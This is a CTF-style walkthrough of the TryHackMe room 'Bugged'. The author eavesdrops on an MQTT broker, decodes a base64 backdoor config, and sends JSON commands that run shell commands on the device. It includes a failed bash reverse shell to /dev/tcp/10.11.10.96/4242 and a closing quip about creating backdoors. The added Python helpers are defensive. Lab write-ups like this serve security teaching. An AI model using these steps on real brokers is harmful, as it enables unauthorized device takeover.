Hey! A new room was released on TryHackMe.com: Bugged. The description mentions weird traffic on a network and home appliances. We are going to complete this room by finding the flag hidden somewhere.
As usual, we start with an nmap scan looking for open ports and services:

Here, we find a single service running on port 1883: mosquitto. This software is an MQTT message broker. The MQTT protocol is typically used by connected devices that only occasionally need to send and receive data. The protocol defines two kinds of entities.
- Clients: the devices on the network that need to communicate with each other, for example a smart thermometer in a room, or an oven that you can remotely turn on and off. Clients do not exchange messages with each other directly.
- Brokers: the devices on the network that centralize these communications. When a device has a message to send, it sends it to a broker, and the broker forwards it to the clients that need it.
To filter messages, every message carries a topic. Topics are usually strings whose levels are separated by forward slashes. For example, the garage temperature sensor could send messages with the topic home/garage/temperature. When a client wants to receive certain messages, it subscribes to topics with the broker. When the broker receives a message whose topic matches, it forwards it to all subscribed devices. Here is a drawing explaining that:
Now that we have a basic understanding of what is happening on the network, we can try to find a way to see what is flowing over it. To do that, we will use the mosquitto_sub tool, which ships in the mosquitto-clients package and can be installed with:
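The topic matching the broker performs is what makes the single-level (+) and multi-level (#) wildcards so powerful, and also why an anonymous subscription to # is effectively a tap on every device. The following block is an added example, not code from the post or from mosquitto: it implements the MQTT topic-filter matching rules (a level is a slash-separated segment, + matches exactly one level, # must be the last level and matches the parent plus any number of children, and wildcard filters never match $-prefixed topics) and shows which of a constructed set of published topics each subscription would receive. All topic names here are constructed for the example.

```python
def filter_is_valid(topic_filter):
    """Check a subscription filter against the MQTT wildcard placement rules."""
    if not topic_filter:
        return False
    levels = topic_filter.split("/")
    for i, level in enumerate(levels):
        if level == "#":
            # '#' is only allowed as the very last level
            if i != len(levels) - 1:
                return False
        elif "#" in level or ("+" in level and level != "+"):
            # wildcards may not be mixed with other characters in a level
            return False
    return True


def topic_matches(topic_filter, topic):
    """Return True if a published topic name matches a subscription filter."""
    if not filter_is_valid(topic_filter):
        raise ValueError("invalid topic filter: %r" % topic_filter)
    if "#" in topic or "+" in topic:
        raise ValueError("topic names must not contain wildcards: %r" % topic)
    # Wildcard filters deliberately do not match $SYS-style topics.
    if topic.startswith("$") and topic_filter[0] in "#+":
        return False
    f_levels = topic_filter.split("/")
    t_levels = topic.split("/")
    for i, level in enumerate(f_levels):
        if level == "#":
            # matches the parent level itself and everything below it
            return True
        if i >= len(t_levels):
            return False
        if level != "+" and level != t_levels[i]:
            return False
    # every filter level matched; the topic must not have extra levels left
    return len(f_levels) == len(t_levels)


def deliveries(subscriptions, published_topics):
    """Map each subscription filter to the published topics it would receive."""
    return {
        sub: [t for t in published_topics if topic_matches(sub, t)]
        for sub in subscriptions
    }


# Constructed sample traffic for a small home network plus a broker status topic.
PUBLISHED = [
    "home/garage/temperature",
    "home/kitchen/oven/status",
    "home/kitchen/temperature",
    "home",
    "$SYS/broker/uptime",
]

if __name__ == "__main__":
    subs = ["home/+/temperature", "home/#", "#", "home/kitchen/+"]
    for sub, topics in deliveries(subs, PUBLISHED).items():
        print("%-22s -> %s" % (sub, topics))
```

Run it and compare the last two columns: home/+/temperature only sees the two temperature sensors, while # sees every device on the network except the broker's own $SYS topics. On a broker, the same matching logic applied to an ACL is what should stop an anonymous client from holding that # subscription in the first place.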
apt install mosquitto mosquitto-clients
Now we can contact the broker and subscribe to every topic to see what the clients are sending on the network. -t indicates the topic we want to subscribe to; here we use the multi-level wildcard # to subscribe to everything, so that we can monitor all the traffic going through the broker.
mosquitto_sub -h $BROKER_IP -t "#" -v
This is what we get:

Now we can see a bunch of IoT devices sending messages about their status and measurements, but one of the devices looks a bit weird: yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config, and it seems to send base64-encoded JSON. Let's try to decode it:

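Spotting that one message by eye works for a handful of devices; on a busier broker you would want to triage the mosquitto_sub -v output automatically and surface every payload that is actually base64-wrapped JSON, since legitimate sensors publish plain readings. This is an added example, not code from the post: it parses "topic payload" lines as mosquitto_sub -v prints them, attempts a strict base64 decode followed by a JSON parse, and returns only the messages that pass both steps. The sample lines, the EXAMPLE/... topics and the id value are all constructed placeholders, not the room's real values.

```python
import base64
import binascii
import json

# Constructed config message of the kind the odd device publishes (placeholder values).
CONFIG = {
    "id": "00000000-0000-4000-8000-000000000000",  # constructed placeholder id
    "pub_topic": "EXAMPLE/pub",
    "sub_topic": "EXAMPLE/sub",
}

# Constructed sample of `mosquitto_sub -h broker -t "#" -v` output, one "<topic> <payload>" per line.
SAMPLE_LINES = [
    "home/garage/temperature 21.4",
    "home/kitchen/oven/status on",
    "home/livingroom/lightbulb/status off",
    "EXAMPLE/config " + base64.b64encode(json.dumps(CONFIG).encode()).decode(),
]


def parse_line(line):
    """Split a mosquitto_sub -v line into (topic, payload); payloads may contain spaces."""
    topic, _, payload = line.rstrip("\n").partition(" ")
    return topic, payload


def decode_base64_json(payload):
    """Return the JSON object hidden in a base64 payload, or None if it is not one."""
    try:
        raw = base64.b64decode(payload, validate=True)  # reject non-base64 characters
        obj = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        # plain sensor readings ("21.4", "on") fail one of these steps
        return None
    # only structured documents are interesting; bare numbers/strings are not
    return obj if isinstance(obj, (dict, list)) else None


def triage(lines):
    """Return {topic: decoded_json} for every line whose payload was base64-wrapped JSON."""
    found = {}
    for line in lines:
        if not line.strip():
            continue
        topic, payload = parse_line(line)
        obj = decode_base64_json(payload)
        if obj is not None:
            found[topic] = obj
    return found


if __name__ == "__main__":
    for topic, obj in triage(SAMPLE_LINES).items():
        print("%s -> %s" % (topic, json.dumps(obj)))
```

Piping real broker output through this (for example `mosquitto_sub -h $BROKER_IP -t "#" -v | python3 triage.py`, adapting the main block to read sys.stdin) gives a defender a short list of devices whose "telemetry" is actually encoded command-and-control configuration, which is the kind of message that should never appear on a properly locked-down broker.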
Interesting: it looks like this unknown device can be interacted with, and we know which topic it is subscribed to. Let's send it a command to see how it responds:
mosquitto_pub -h $BROKER_IP -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m '{"HELP"}'
And we see a response:

And, when we decode it:

Hmm, it looks like this device is a backdoor into the network, and we now know what kind of messages it expects. Let's play with it some more. Using the ID we got from the first message, we can send this command:
{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "HELP"}
And we get a more complete answer:

Which, once decoded, gives us:

When we run the SYS command, we learn that the system is running a generic 64-bit Linux distribution. We can now run shell commands on the system. If we try a simple bash reverse shell:
{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "$REVERSE_SHELL_COMMAND"}
This is what we get in return:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"/bin/sh: 1: cannot create /dev/tcp/10.11.10.96/4242: Directory nonexistent\n"}
It also looks like netcat is not present on the system. Maybe we are going too fast here; if we simply run ls, this is the answer we get:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag.txt\n"}
It was there all along. Now we can cat it, and we have our flag!

Yay! We got our flag, and this room is now complete! I hope you learned a thing or two about MQTT and IoT security, maybe a new idea to create a backdoor if you ever need to. It also personally reminded me that sometimes the simplest things should be tried first. See you next time!